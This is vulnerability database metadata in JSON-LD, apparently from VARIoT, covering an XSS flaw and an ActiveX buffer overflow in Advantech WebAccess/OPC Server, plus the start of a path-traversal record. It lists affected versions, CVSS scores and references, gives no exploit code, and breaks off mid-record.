Cross-site scripting (XSS) vulnerability in Advantech/BroadWin WebAccess before 7.0 allows remote attackers to inject arbitrary web script or HTML via a malformed URL. Advantech Advantech specializes in network computer and network automation, providing more than 450 products including industrial data acquisition, automation software, computer platforms, Advantech industrial computers, computer motherboards and accessories. Advantech/BroadWin SCADA WebAccess is a fully browser-based Human Machine Interface (HMI) and Monitoring and Data Acquisition (SCADA) software. Advantech WebAccess is prone to multiple remote vulnerabilities. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, execute arbitrary code gain access to sensitive information, cause a denial-of-service condition. Other attacks are possible. ----------------------------------------------------------------------
Ovum says ad hoc tools are out-dated. The best practice approach? Fast vulnerability intelligence, threat handling, and setup in one tool.
Read the new report on the Secunia VIM: http://secunia.com/products/corporate/vim/ovum_2011_request/
TITLE: Advantech OPC Server ADAM ActiveX Control Buffer Overflow Vulnerability
SECUNIA ADVISORY ID: SA46775
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/46775/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=46775
RELEASE DATE: 2011-11-07
DISCUSS ADVISORY: http://secunia.com/advisories/46775/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/46775/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=46775
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: A vulnerability has been reported in Advantech OPC Server, which can be exploited by malicious people to compromise a user's system.
The vulnerability is caused due to an error in the ADAM ActiveX control and can be exploited to cause a buffer overflow.
Successful exploitation may allow execution of arbitrary code.
The vulnerability is reported in the following components: * Advantech ADAM OPC Server versions prior to V3.01.012. * Advantech Modbus RTU OPC Server versions prior to V3.01.010. * Advantech Modbus TCP OPC Server versions prior to V3.01.010.
SOLUTION: Reportedly a patch has been released. Contact the vendor for further information.
PROVIDED AND/OR DISCOVERED BY: ICS-CERT credits Security Research and Service Institute Information and Communication Security Technology Center (ICST).
ORIGINAL ADVISORY: ICS-CERT: http://www.us-cert.gov/control_systems/pdf/ICSA-11-279-01.pdf
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
Show details on source website
{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201202-0213", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "eq", "trust": 1.6, "vendor": "advantech", "version": "5.0" }, { "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "6.0" }, { "model": "broadwin webaccess", "scope": "eq", "trust": 0.9, "vendor": "advantech", "version": "7.0" }, { "model": "webaccess", "scope": "lt", "trust": 0.8, "vendor": "broadwin", "version": "7.0" }, { "model": "webaccess", "scope": "lt", "trust": 0.8, "vendor": "advantech", "version": "7.0" }, { "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "6.0" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "advantech webaccess", "version": "5.0" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "advantech webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "1a6be0a8-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0662" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001551" }, { "db": "CNNVD", "id": "CNNVD-201202-409" }, { "db": "NVD", "id": "CVE-2012-0233" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:broadwin:webaccess", "vulnerable": true }, { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2012-001551" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Sense Vulnerability Coordination Team, Greg MacManus of iSIGHT Partners, Kuang-Chun Hung of Security Research and Service Institute-Information and Communication Security Technology Center (ICST), Luigi Auriemma, and\nSnake (alias).", "sources": [ { "db": "BID", "id": "52051" } ], "trust": 0.3 }, "cve": "CVE-2012-0233", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "exploitabilityScore": 8.6, "id": "CVE-2012-0233", "impactScore": 2.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 1.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "exploitabilityScore": 8.6, "id": "1a6be0a8-2354-11e6-abef-000c29c66e3d", "impactScore": 2.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.2, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.9 [IVD]" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "exploitabilityScore": 8.6, "id": "VHN-53514", "impactScore": 2.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2012-0233", "trust": 1.0, "value": "MEDIUM" }, { "author": "NVD", "id": "CVE-2012-0233", "trust": 0.8, "value": "Medium" }, { "author": "CNNVD", "id": "CNNVD-201202-409", "trust": 0.6, "value": "MEDIUM" }, { "author": "IVD", "id": "1a6be0a8-2354-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-53514", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "IVD", "id": "1a6be0a8-2354-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-53514" }, { "db": "JVNDB", "id": "JVNDB-2012-001551" }, { "db": "CNNVD", "id": "CNNVD-201202-409" }, { "db": "NVD", "id": "CVE-2012-0233" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Cross-site scripting (XSS) vulnerability in Advantech/BroadWin WebAccess before 7.0 allows remote attackers to inject arbitrary web script or HTML via a malformed URL. Advantech Advantech specializes in network computer and network automation, providing more than 450 products including industrial data acquisition, automation software, computer platforms, Advantech industrial computers, computer motherboards and accessories. Advantech/BroadWin SCADA WebAccess is a fully browser-based Human Machine Interface (HMI) and Monitoring and Data Acquisition (SCADA) software. Advantech WebAccess is prone to multiple remote vulnerabilities. \nExploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, execute arbitrary code gain access to sensitive information, cause a denial-of-service condition. Other attacks are possible. ----------------------------------------------------------------------\n\nOvum says ad hoc tools are out-dated. The best practice approach?\nFast vulnerability intelligence, threat handling, and setup in one tool. \n\nRead the new report on the Secunia VIM:\nhttp://secunia.com/products/corporate/vim/ovum_2011_request/ \n\n----------------------------------------------------------------------\n\nTITLE:\nAdvantech OPC Server ADAM ActiveX Control Buffer Overflow\nVulnerability\n\nSECUNIA ADVISORY ID:\nSA46775\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/46775/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=46775\n\nRELEASE DATE:\n2011-11-07\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/46775/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/46775/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=46775\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nA vulnerability has been reported in Advantech OPC Server, which can\nbe exploited by malicious people to compromise a user\u0027s system. \n\nThe vulnerability is caused due to an error in the ADAM ActiveX\ncontrol and can be exploited to cause a buffer overflow. \n\nSuccessful exploitation may allow execution of arbitrary code. \n\nThe vulnerability is reported in the following components:\n* Advantech ADAM OPC Server versions prior to V3.01.012. \n* Advantech Modbus RTU OPC Server versions prior to V3.01.010. \n* Advantech Modbus TCP OPC Server versions prior to V3.01.010. \n\nSOLUTION:\nReportedly a patch has been released. Contact the vendor for further\ninformation. \n\nPROVIDED AND/OR DISCOVERED BY:\nICS-CERT credits Security Research and Service Institute Information\nand Communication Security Technology Center (ICST). \n\nORIGINAL ADVISORY:\nICS-CERT:\nhttp://www.us-cert.gov/control_systems/pdf/ICSA-11-279-01.pdf\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n", "sources": [ { "db": "NVD", "id": "CVE-2012-0233" }, { "db": "JVNDB", "id": "JVNDB-2012-001551" }, { "db": "CNVD", "id": "CNVD-2012-0662" }, { "db": "BID", "id": "52051" }, { "db": "IVD", "id": "1a6be0a8-2354-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-53514" }, { "db": "PACKETSTORM", "id": "106765" } ], "trust": 2.79 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2012-0233", "trust": 3.6 }, { "db": "ICS CERT", "id": "ICSA-12-047-01", "trust": 2.3 }, { "db": "BID", "id": "52051", "trust": 1.4 }, { "db": "CNNVD", "id": "CNNVD-201202-409", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2012-0662", "trust": 0.8 }, { "db": "ICS CERT", "id": "ICSA-12-047-01A", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2012-001551", "trust": 0.8 }, { "db": "ICS CERT", "id": "ICSA-11-279-01", "trust": 0.4 }, { "db": "IVD", "id": "1A6BE0A8-2354-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "SECUNIA", "id": "46775", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-53514", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "106765", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "1a6be0a8-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0662" }, { "db": "VULHUB", "id": "VHN-53514" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001551" }, { "db": "PACKETSTORM", "id": "106765" }, { "db": "CNNVD", "id": "CNNVD-201202-409" }, { "db": "NVD", "id": "CVE-2012-0233" } ] }, "id": "VAR-201202-0213", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "1a6be0a8-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0662" }, { "db": "VULHUB", "id": "VHN-53514" } ], "trust": 1.551177005 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "1a6be0a8-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0662" } ] }, "last_update_date": "2024-11-23T21:46:31.744000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "WebAccess", "trust": 0.8, "url": "http://www.advantech.co.jp/products/Webaccess-HMI-SCADA-Software/sub_GF-1M94V.aspx" }, { "title": "Top Page", "trust": 0.8, "url": "http://www.broadwin.com/Products.htm" }, { "title": "Offices Distributors", "trust": 0.8, "url": "http://www.broadwin.com/Offices.htm" }, { "title": "\u30d1\u30fc\u30c8\u30ca\u30fc\u60c5\u5831", "trust": 0.8, "url": "http://www.advantech.co.jp/support-AJP/distributors.asp" }, { "title": "Top Page", "trust": 0.8, "url": "http://www.advantech.co.jp/" }, { "title": "Patch for Advantech WebAccess Cross-Site Scripting Vulnerability (CNVD-2012-0662)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/10191" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2012-0662" }, { "db": "JVNDB", "id": "JVNDB-2012-001551" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-79", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-53514" }, { "db": "JVNDB", "id": "JVNDB-2012-001551" }, { "db": "NVD", "id": "CVE-2012-0233" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.3, "url": "http://www.us-cert.gov/control_systems/pdf/icsa-12-047-01.pdf" }, { "trust": 1.1, "url": "http://www.securityfocus.com/bid/52051" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-0233" }, { "trust": 0.8, "url": "http://www.us-cert.gov/control_systems/pdf/icsa-12-047-01a.pdf" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2012-0233" }, { "trust": 0.4, "url": "http://www.us-cert.gov/control_systems/pdf/icsa-11-279-01.pdf" }, { "trust": 0.3, "url": "http://webaccess.advantech.com/product.php" }, { "trust": 0.1, "url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=46775" }, { "trust": 0.1, "url": "http://secunia.com/vulnerability_intelligence/" }, { "trust": 0.1, "url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/secunia_security_advisories/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/about_secunia_advisories/" }, { "trust": 0.1, "url": "http://secunia.com/vulnerability_scanning/personal/" }, { "trust": 0.1, "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org" }, { "trust": 0.1, "url": "http://secunia.com/products/corporate/vim/ovum_2011_request/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/46775/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/46775/#comments" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2012-0662" }, { "db": "VULHUB", "id": "VHN-53514" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001551" }, { "db": "PACKETSTORM", "id": "106765" }, { "db": "CNNVD", "id": "CNNVD-201202-409" }, { "db": "NVD", "id": "CVE-2012-0233" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "1a6be0a8-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0662" }, { "db": "VULHUB", "id": "VHN-53514" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001551" }, { "db": "PACKETSTORM", "id": "106765" }, { "db": "CNNVD", "id": "CNNVD-201202-409" }, { "db": "NVD", "id": "CVE-2012-0233" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2012-02-20T00:00:00", "db": "IVD", "id": "1a6be0a8-2354-11e6-abef-000c29c66e3d" }, { "date": "2012-02-20T00:00:00", "db": "CNVD", "id": "CNVD-2012-0662" }, { "date": "2012-02-21T00:00:00", "db": "VULHUB", "id": "VHN-53514" }, { "date": "2012-02-16T00:00:00", "db": "BID", "id": "52051" }, { "date": "2012-02-23T00:00:00", "db": "JVNDB", "id": "JVNDB-2012-001551" }, { "date": "2011-11-09T12:04:37", "db": "PACKETSTORM", "id": "106765" }, { "date": "2012-02-22T00:00:00", "db": "CNNVD", "id": "CNNVD-201202-409" }, { "date": "2012-02-21T13:31:56.953000", "db": "NVD", "id": "CVE-2012-0233" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2012-02-20T00:00:00", "db": "CNVD", "id": "CNVD-2012-0662" }, { "date": "2018-01-05T00:00:00", "db": "VULHUB", "id": "VHN-53514" }, { "date": "2012-02-16T00:00:00", "db": "BID", "id": "52051" }, { "date": "2012-02-23T00:00:00", "db": "JVNDB", "id": "JVNDB-2012-001551" }, { "date": "2012-02-22T00:00:00", "db": "CNNVD", "id": "CNNVD-201202-409" }, { "date": "2024-11-21T01:34:37.953000", "db": "NVD", "id": "CVE-2012-0233" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201202-409" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech/BroadWin WebAccess Vulnerable to cross-site scripting", "sources": [ { "db": "JVNDB", "id": "JVNDB-2012-001551" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "XSS", "sources": [ { "db": "CNNVD", "id": "CNNVD-201202-409" } ], "trust": 0.6 } }
var-201810-0130
Vulnerability from variot
WADashboard API in Advantech WebAccess 8.3.1 and 8.3.2 allows remote authenticated attackers to read any file on the filesystem due to a directory traversal vulnerability in the readFile API. Advantech WebAccess Contains a path traversal vulnerability.Information may be obtained. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. The WADashboard API is one of the dashboard API components. A path traversal vulnerability exists in the \342\200\230readFile\342\200\231 method of the WADashboard API in Advantech WebAccess versions 8.3.1 and 8.3.2
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201810-0130", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "eq", "trust": 3.0, "vendor": "advantech", "version": "8.3.1" }, { "model": "webaccess", "scope": "eq", "trust": 3.0, "vendor": "advantech", "version": "8.3.2" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "8.3.1" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "8.3.2" } ], "sources": [ { "db": "IVD", "id": "e300ebb0-39ab-11e9-9feb-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-22715" }, { "db": "JVNDB", "id": "JVNDB-2018-011788" }, { "db": "CNNVD", "id": "CNNVD-201810-1563" }, { "db": "NVD", "id": "CVE-2018-15706" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2018-011788" } ] }, "cve": "CVE-2018-15706", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 6.8, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.0, "id": "CVE-2018-15706", "impactScore": 6.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 1.1, "vectorString": "AV:N/AC:L/Au:S/C:C/I:N/A:N", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "Single", "author": "NVD", "availabilityImpact": "None", "baseScore": 4.0, "confidentialityImpact": "Partial", "exploitabilityScore": null, "id": "CVE-2018-15706", "impactScore": null, "integrityImpact": "None", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Medium", "trust": 0.8, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2018-22715", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "e300ebb0-39ab-11e9-9feb-000c29342cb1", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.9 